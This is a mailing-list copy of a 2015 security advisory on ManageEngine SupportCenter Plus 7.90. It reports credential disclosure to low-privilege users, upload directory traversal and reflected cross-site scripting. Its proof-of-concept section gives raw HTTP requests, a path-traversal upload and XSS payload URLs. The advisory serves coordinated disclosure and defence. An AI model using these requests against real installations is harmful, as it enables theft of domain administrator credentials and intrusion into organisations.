[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 19 Jun 2015 14:59:04 +0200
Document Title:
===============
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1501
Release Date:
=============
2015-06-19
Vulnerability Laboratory ID (VL-ID):
====================================
1501
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
SupportCenter Plus is a web-based customer support software that lets
organizations effectively manage customer tickets, their account and
contact information, the service contracts and in the process providing a
superior customer experience. SupportCenter Plus is commonly deployed on
internet accessible interfaces to allow customers to access the application.
This common deployment scenario often involves a combination of
low privilege accounts for customers (typically local authentication) and
higher privilege accounts for help desk stuff (typically Active Directory
integrated). Note that it is not unusual to allow any internet user to be able
to register a low privilege account. This deployment scenario is
important to consider when evaluating the risk of the below vulnerabilities.
(Copy of the Vendor Homepage:
https://www.manageengine.com/products/support-center/ )
Abstract Advisory Information:
==============================
An indepndent vulnerability researcher discovered multiple vulnerabilities in
the official ManageEngine SupportCenter Plus v7.90 web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-27: Researcher Notification & Coordination (Alain Homewood)
2015-06-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Manage Engine
Product: SupportCenter Plus - Web Application 7.90
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1 Improper authentication disclosing password (Authenticated)
Missing user access control mechanisms allow low privilege users to gain
unauthorised access to sensitive Active Directory integration functionality
normally only accessibly by Administrators.
This functionality allows a low privilege user to:
1.) Retrieve the plain text user name and password for the domain account
(typically Domain Administrator or similar) used to integrate with Active
Directory
2.) Configure arbitrary domains to be used for authentication and import users
from these domains (overwriting existing user records)
A low privilege user in SupportCenter Plus can gain privileged access to both
the application and any integrated domains. Typical attack scenarios could
include:
1.) SupportCenter Plus is accessible via the internet. An internet based
attacker who can gain access to a low privilege account (registering an account
if enabled or stealing an account) can gain access to highly privileged domain
credentials. The attacker can then use these credentials to gain remote access
to the organisation through other means (e.g. VPNs or physically in a meeting
room at the organisation).
2.) SupportCenter Plus is not accessible via the internet. An attacker who has
gained a low level of compromise in an organisation (i.e. any user who can
access SupportCenter Plus) can use these vulnerabilities to escalate themselves
to domain administrator or similar.
Pre-requisites and considerations include:
- In order to steal existing domain credentials it is necessary for Active
Directory integration to have been setup.
- In order to import users from an attacker controlled domain it is necessary
for the SupportCenter Plus server to have network connectivity to the attacker
server (i.e. firewall rules may prevent this)
- It is possible to login to SupportCenter Plus using domain authentication
even when this option is hidden (typically done so that the domain name isn`t
displayed on the internet accessible login)
1.2 Directory traversal on file upload (Authenticated)
Low privilege users have the ability to attach files to work order requests
(e.g. to attach a screenshot).
This functionality is vulnerable to directory traversal and allows low
privilege users to upload files to arbitrary directories.
Potential impacts of this vulnerability include:
1.) Remote code execution ***
2.) Denial of service
3.) Uploading malicious static content to web accessible directories (e.g.
JavaScript, malware etc)
*** There are two key limitations to this vulnerability that limit any easily
exploitable method for code execution through exploiting the underlying JBoss
environment:
1.) A Java compiler is not installed as part of SupportCenter Plus which
prevents uploaded JSP files from being executed
2.) The uploaded directory always appends an additional directory (named after
the user`s ID) which prevents deployment of a packaged or unpackaged WAR file
(or similar)
Despite the above limitations I cannot con conclusively determine that code
execution is not possible.
1.3 Reflected cross site scripting (Authenticated)
Multiple authenticated reflected cross site scripting vulnerabilities exist in
SupportCenter Plus.
Unsanitised user provided input in the `query` parameter is echoed back to the
user during requests to /CustomReportHandler.do.
Only administrators (or similar highly privileged) users with access to the
custom report functionality are vulnerable to this attack vector.
Unsanitised user provided input in the `compAcct` parameter is echoed back to
user during requests to /jsp/ResetADPwd.jsp.
Unsanitised user provided input in the `redirectTo` parameter is echoed back to
user during requests to /jsp/CacheScreenWidth.jsp.
All authenticated users are vulnerable to these attack vectors.
Proof of Concept (PoC):
=======================
1.1
The vulnerability can be exploited by remote attackers without user
interaction.
For security demonstration or to reproduce follow the provided information and
steps below.
Manual steps to reproduce the vulnerability ...
1.) Set up a Active Directory domain
2.) Install SupportCenter Plus
3.) Login as an administrator and add a Windows domain and associated
credentials
4.) Logout and login as a low privilege user (by default there is guest/guest
account)
5.) Attempt to access the above URLs and observe that you can access the
functionality with no restrictions
(e.g. browse to
http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
and view the password in the HTML source code)
Plain text domain credentials can be viewed in the HTML source code of the
following pages when logged in as low privilege user:
http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
http://[VULNERABLE]/ImportADUsers.do
Additional domains can be added through browsing to
http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
and then selecting "Add New Domain" which will allow you to enter the domain
details resulting in a POST similar to this:
POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Referer: http://[VULNERABLE]:9090/AdminHome.do
Content-Length: 181
Cookie: [object HTMLTableRowElement]=show; [object
HTMLDivElement]=show; [object HTMLTableCellElement]=show;
3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide;
JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=;
JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description=
Domain users can be imported by browsing to
http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next.
You can then select the Operation Units (OUs) you want to import from the
domain and click "Start Import" resulting in a POST similar to this:
POST /ImportADUsers.do HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/ImportADUsers.do
Cookie: [object HTMLTableRowElement]=show; [object
HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=;
JSESSIONID=96062390B861F5901A937CE3A71A8F4D;
JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow;
3Adminhelpcoll=helpcollhide
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 193
selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true
1.2
The vulnerability can be exploited by remote attackers without user
interaction.
For security demonstration or to reproduce follow the provided information and
steps below.
Files are uploaded via a POST request to
/workorder/Attachment.jsp?component=Request
It is possible to manipulate the "module" parameters to traverse directories.
Decompiled source code of the creation of the file path is shown below:
String filePath1 = "Attachments" + filSep + module + filSep + userID1
Note that an additional directory (named after the user's ID) is always
appended to file path.
In the below example POST a module value of
../../../../../../../../../../../../ is specified and the logged in user has an
ID value of 2.
The resulting file in this case is uploaded to c:\2\payload.html on a Windows
environment.
An example POST request is shown below:
POST /workorder/Attachment.jsp?component=Request HTTP/1.1
Host: [VULNERABLE]:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request
Cookie: [object HTMLTableRowElement]=show; [object
HTMLDivElement]=show; [object HTMLTableCellElement]=show;
PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A;
3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN;
JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------17390486101970088239358532669
Content-Length: 1110
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="filePath"; filename="payload.html"
Content-Type: application/octet-stream
test12345
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="filename"
payload.html
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="vecPath"
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="vec"
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="theSubmit"
AttachFile
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="formName"
null
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="component"
../../../../../../../../../../../../
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="ATTACH"
Attach
-----------------------------17390486101970088239358532669--
1.3
The cross site scripting web vulnerability can be exploited by remote attackers
with low or medium user interaction.
For security demonstration or to reproduce follow the provided information and
steps below.
Administrator user only:
http://[VULNERABLE]:9090/CustomReportHandler.do?module=run_query_editor_query&reportTitle=test&query=<BODY%20ONLOAD=alert(1)>
Any authenticated user:
http://[VULNERABLE]:9090/jsp/ResetADPwd.jsp?compAcct=%22%3E%3CIFRAME%20SRC=%22http://www.google.com%22%3E%3C/IFRAME%3E
http://[VULNERABLE]:9090/jsp/CacheScreenWidth.jsp?width=1600&redirectTo=";alert(1);//
Security Risk:
==============
1.1
The security risk of the authentication disclosing password vulnerability is
estimated as high. (CVSS 6.9)
1.2
The security risk of the directory traversal web vulnerability is estimated as
high. (CVSS 5.9)
1.3
The security risk of the cross site scripting web vulnerabilities are estimated
as medium. (CVSS 3.3)
Credits & Authors:
==================
Alain Homewood (PwC New Zealand) -
[http://vulnerability-lab.com/show.php?user=Alain%20Homewood]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2015 | Vulnerability Laboratory -
[Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY:
http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/